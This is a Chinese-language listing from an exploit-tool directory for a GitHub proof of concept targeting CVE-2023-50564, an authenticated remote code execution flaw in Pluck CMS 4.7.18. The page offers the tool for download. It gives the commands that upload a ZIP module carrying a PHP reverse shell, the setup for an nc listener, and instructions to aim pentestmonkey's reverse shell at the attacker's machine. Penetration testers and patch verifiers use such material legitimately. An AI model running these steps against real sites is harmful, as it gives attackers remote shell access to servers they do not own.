Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/glynzr/cve-2023-50564
Payload生成漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubglynzr/cve-2023-50564

CVE-2023-50564

Pluck v4.7.18 - 远程代码执行 (RCE)

查看仓库
31年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-50564

📌 描述

此漏洞允许 Pluck CMS v4.7.18 中经过认证的管理员上传一个包含 PHP 后门的恶意 ZIP 模块,从而导致远程代码执行 (RCE)。


⚙️ 功能特点

  • 使用有效的用户名和密码对目标进行身份验证
  • 自动从提供的 PHP 文件创建 ZIP 压缩包
  • 将模块上传到存在漏洞的 installmodule 端点
  • 触发载荷并显示输出
  • 支持自定义目标、端口、凭据和 shell 路径

🚀 使用方法

root@kitploit:~
git clone https://github.com/glynzr/CVE-2023-50564.git
cd CVE-2023-50564
pip3 install -r requirements.txt

python3 exploit.py -h
root@kitploit:~
python3 exploit.py -t <target> -u <username> -pass <password> -path <path_to_php_shell> [-p <port>]
  • 端口为可选参数,默认值为 80(如果未指定)。
  • 指定目标时,需提供 IP 地址或域名(例如 127.0.0.1 或 test.domain)。

示例利用

首先,应在攻击机器上启动反向 shell 监听器(此终端标签不应关闭):

root@kitploit:~
nc -nvlp <specify port>

然后,从 https://github.com/pentestmonkey/php-reverse-shell 下载 PHP 反向 shell,并根据攻击机器的信息(IP、端口)进行自定义。

在另一个标签中运行漏洞利用代码:

root@kitploit:~
python3 exploit.py -t test.com -u admin -pass samplepassword -path ../php-reverse-shell.php
下载工具